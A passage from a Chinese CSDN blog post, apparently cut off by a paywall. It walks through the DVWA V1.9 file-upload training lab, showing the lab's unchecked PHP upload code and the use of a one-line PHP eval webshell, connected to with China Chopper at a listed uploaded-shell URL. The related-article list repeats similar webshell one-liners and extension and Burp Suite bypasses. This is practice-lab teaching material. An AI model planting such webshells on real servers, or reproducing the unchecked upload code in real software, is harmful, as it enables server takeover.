DVWA V1.9:File Upload(文件上传)

最新推荐文章于 2022-10-02 12:16:21 发布
最新推荐文章于 2022-10-02 12:16:21 发布
阅读量736 收藏 1
点赞数 1
分类专栏: 靶场实战 文章标签: 安全 渗透 dvwa 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/104082965
版权
本文详细介绍了DVWA V1.9中的文件上传漏洞,从Low到Impossible四个级别,分析了每个级别中的核心代码、官方提示及漏洞利用方法。在Low级别,服务器对文件类型和内容不做检查,允许执行恶意代码。Medium级别增加了文件类型和大小限制,但可通过改扩展名或Burp Suite抓包绕过。High级别通过检查文件名和文件头防止非图像文件上传,但利用Copy方法仍能上传恶意文件。Impossible级别通过重命名、反CSRF和内容检查,使得攻击难以执行。
摘要由CSDN通过智能技术生成

DVWA V1.9:File Upload(文件上传)

File Inclusion 介绍

上传的文件是Web应用程序的一大风险。
许多攻击的第一步是让一些代码攻击系统,然后攻击者只需要找到一种方法来执行代码。
使用文件上传有助于攻击者完成第一步。

不受限制的文件上传的后果会有所不同,包括完整的系统接管、过载的文件系统、向后端系统转发攻击和简单的破坏。
这取决于应用程序对上传文件所做的操作,包括存储的位置。
在这里插入图片描述

Low 级别

核心代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
   
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
   
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
   
        // Yes!
        echo "<pre>{
     $target_path} succesfully uploaded!</pre>";
    }
}

?>

basename(path,suffix)
函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。

可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

官方提示

低级别将不检查文件以任何方式上载的内容。它只依赖于信任。

Spoiler: Upload any valid PHP file with command in it.

漏洞利用

文件上传漏洞的利用是有限制条件的,
首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。
不幸的是,这里三个条件全都满足。

编写php一句话木马文件。

<?php eval($_POST[wanku]);?>

在这里插入图片描述
上传木马文件。
在这里插入图片描述
路径也给出来了,使用菜刀去连接,成功。

http://43.247.91.228:81/hackable/uploads/shell.php

在这里插入图片描述

Medium 级别

核心代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
   
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][
最低0.47元/天 解锁文章
CNwanku
关注
专栏目录
DVWA File Upload
部分学习记录
09-22 202
low 未对上传文件进行任何过滤,可以直接上传一个shell文件shell.php,例如一句话木马,通过暴露出的路径来执行该文件,然后利用菜刀进行连接,获取服务器文件信息,利用文件管理和虚拟终端进行其他操作 medium 要求上传JPEG或者PNG格式的图片 将shell.php修改为shell.png(绕过文件类型检测),尝试利用burp抓包修改文件后缀为php(上传到服务器后的文件名),上传成功 high 查看源代码发现对文件名进行了截取,其中涉及到了strrpos()函数,就去查了一下 由于限制
DVWA-File Upload(文件上传)
简简的博客
02-02 483
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA-File Upload(Medium)
七月_的博客
10-23 313
文章目录File Upload(Medium)代码分析 File Upload(Medium) 代码分析 ```php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/u...
DVWA-File Upload
qq_45751902的博客
04-25 374
目录简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible 简介 概念 File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限; 这里上传的文件可以是木马,病毒,恶意脚本等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果; 文件上传漏洞的前提条件 能上传木
DVWA V1.9:File Inclusion(文件包含)
qq_43233085的博客
01-24 542
DVWA V1.9:File Inclusion(文件包含)File Inclusion 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 File Inclusion 介绍 一些Web应用程序允许用户指定直接用于文件流的输入,或者允许用户将文件上载到服务器。 在稍后的时间,Web应用...
DVWA—文件包含漏洞(File Inclusion)
qq_54537919的博客
06-27 1153
DVWA—文件包含漏洞(File Inclusion)
File Upload文件上传
热门推荐
kid的博客
04-19 1万+
File Upload 前言 文件上传漏洞:攻击者上传了一个可执行的脚本文件,通过此脚本文件获得了执行服务器端命令的功能。文件上传是否会产生漏洞关键在于服务器怎么来处理,怎么来解析这个文件。如果说服务器处理的模式不够安全,那么就会导致严重的后果,也就是上传了恶意的可执行文件以后,服务器端对此文件进行执行 文件上传漏洞需要对一句话木马,以及菜刀的使用有所了解。 练习 Low 文件上传我们直接先尝...
DVWA-File Upload/文件上传漏洞
jammny
11-22 1105
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
DVWAFile Upload
baynk的博客
10-29 877
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...
DVWAFile Upload
weixin_42075643的博客
02-18 257
新的一年,继续学习 ???? 今天学习文件上传,还是 DVWA上试试~~ ** low level ** 查看源码:)(这里就不贴代码了,环境里都有) 点击view source即可! 开始测试吧! 通过看代码,代码未做任何限制和过滤可以直接上传一句话木马: <?php eval($_POST[a]);?> 我这里命名为yjh.php: 显示成功之后,可以用中国蚁剑直接连接: 这里大概写一下蚁剑的基本使用方法: 打开界面,空白处右键——>添加数据——>粘贴传入的地址URL以
DVWA File Upload(文件上传)
qq_45780190的博客
05-11 164
Low 源代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //设置上传目录 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); //上传目录加上‘uploaded’表单参数所提交的文件名 // Can we move
DVWA——File Upload
qq_54448882的博客
11-09 3195
此文章仅供学习使用,请勿用作违法行为。 目录 简介 文件上传漏洞 Webshell(网页后门) 造成文件上传漏洞的主要原因 危害 Low 上传一句话木马 使用蚁剑连接 Medium 上传一句话木马 拦截信息改变上传文件类型 蚁剑连接 简介: 文件上传漏洞: 文件上传漏洞主要攻击web服务,有文件上传存在的地方都有可能存在文件上传的漏洞,但并不是所有地方都存在这个漏洞。漏洞是否存在取决于对方的代码的完整性,若某些验证代码存在疏忽,就很可能造成文件上传漏洞。例...
DVWAFile Upload文件上传
最新发布
RexHa的博客
10-02 2760
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA--file upload文件上传
weixin_50342860的博客
08-23 1486
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA安全实验:文件上传与包含漏洞分析
"网络安全实验,涉及文件上传与文件包含漏洞,使用DVWA测试环境,通过Kali Linux进行攻击机操作。" 在网络安全领域,文件上传与文件包含是两种常见的Web应用程序安全漏洞,它们允许攻击者利用系统弱点来执行恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值